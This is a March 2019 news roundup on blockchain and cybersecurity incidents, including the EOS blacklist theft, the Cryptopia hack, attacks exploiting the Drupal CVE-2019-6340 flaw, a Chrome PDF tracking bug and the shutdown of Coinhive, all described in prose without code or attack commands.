Last Week In Blockchain and CyberSecurity News - March 5, 2019

Hacker Steals $7.7 Million In EOS Cryptocurrency After Blacklist Snafu

On Saturday, February 23, EOS42, a web-based community of EOS cryptocurrency owners disclosed a hack via a Telegram public post. Reportedly, the hack occurred when a new EOS block producer named “game.eos” failed to update the blacklist for EOS mainnet accounts. The blacklist is a feature of the EOS blockchain which requires block producers to identify and update a list of compromised accounts. For the feature to work, a block producer needs to blacklist all top 21 BPs. If only one top 21 BP does not have an updated blacklist, hacked accounts are vulnerable to being emptied," said the EOS42 team in a Medium blog post. The procedure was put in place to prevent hackers from stealing funds, but as seen in the incident, it did not work as intended. EOS42 further explained the “scenario played out [during the hack] is when a newly rotated top 21 BP [fails] to apply the blacklist.” As “games.eos” did not update the blacklist for the EOS mainnet accounts, an anonymous hacker was able to move 2.09 million EOS($7.7 million) from a frozen hacked account to several wallets at various cryptocurrency exchanges.

Hacked Exchange Cryptopia Discloses Estimate of Stolen Crypto

In the past month, we have been following the Cryptopia exchange hack that took the exchange offline, stating they had experienced a “security breach which resulted in significant losses.” The exchange did not provide much information on what specifically occurred as the New Zealand Police were going to conduct an investigation. Blockchain data analytic firms have estimated as much as $16 million was stolen in Ethereum and ERC-20 tokens from the exchange, but no official estimate was given until last week. In a series of tweets, Cryptopia stated that they “are continuing to work on assessing the impact incurred as a result of the hack in January. Currently, [they] have calculated that worst case 9.4% of [their] total holdings was stolen.” Although this statement does not provide an actual monetary amount, 9.4% is still a large chunk of their total holdings. Cryptopia also states they are securing all wallets individually and that the exchange will be reopened “as read-only” by Match 4th.

Cryptocurrency Miners Exploit Latest Drupal Flaw

Within a couple of days after Drupal urged website admins to apply an update patching a highly critical vulnerability in the content management system (CMS) platform, threat actors were seen targeting unpatched systems. The vulnerability (known as CVE 2019-6340 and SA-CORE-2019-003) relate to field types that do not sanitize data from non-form sources when the Drupal 8 core REST module and other web service modules such as JSON:API are both enabled. Having this vulnerability can allow arbitrary PHP remote code execution, which could lead to the compromise of the web server. The day after the update went live, a proof-of-concept exploit was published online followed by a wave of attacks. Attacks included a JavaScript-based cryptocurrency miner called CoinIMP that can hijack a visitor’s machine to mine for virtual currency(Monero, etc.) Other attacks include attempts to leverage the Drupal exploit to install a shell allowing attackers to upload various files to unpatched Drupal sites.

Google Chrome Bug Used In The Wild To Collect User Data Via PDF Files

An exploit detection service named EdgeSpot claims it has discovered a vulnerability that allows attackers to collect data from users who open PDF files inside of Chrome’s built-in PDF viewer. EdgeSpot stated the PDF documents would contact a remote domain with information on the users' device --such as IP address, OS version, Chrome version, and the path of the PDF file on the user's computer. The researchers stated no suspicious activity occurred when PDFs were opened using other PDF readers such as Adobe reader, but outbound traffic is detected when they are opened with Chrome. Collecting these types of data on users who open PDF files can aid attackers in their future endeavors. Security expert Patrick Wardle analyzed the PDFs and stated that the issue lies in Chrome not alerting users when a PDF submits data to a remote server, which can then allow this type of tracking. He believes this should not be classified as a “zero-day.” The exploit detection service notified Google about this vulnerability and are now promised a fix by the end of April. EdgeSpot recommends to use a different PDF viewer, or disable your internet while opening PDFS in Chrome.

Coinhive In-Browser Cryptomining Service Shuts Down on March 8

Rather than making money through advertisements that may track online activity or disturb customers Coinhive would allow websites a reasonable way of generating income. Using a piece of Javascript embedded on a webpage, Coinhive would use visiting computers to mine Monero cryptocurrency, take a percentage, and allow the website operators to keep the rest. Unfortunately, criminals used this to make easy money as they hacked websites and ran Coinhive to “cryptojack” thousands of unpatched devices. Recently, Coinhive announced that it would discontinue its services on March 8, 2019. The developers state that the service is not economically viable anymore, mentioning the last Monero hard fork “lead to a 50% decrease in hash rate and the YoY depreciation of the XMR currency.” Coinhive also mentioned that all mining operations would automatically stop after March 8. However, the service dashboard will be accessible until April 30, 2019, allowing Coinhive customers to initiate payouts. The discontinuation of Coinhive also implies the termination of Coinhive-powered cryptojacking campaigns hackers have conducted over the past several months. However, it will not be long until malicious actors switch to other Javascript in-browser cryptomining libraries.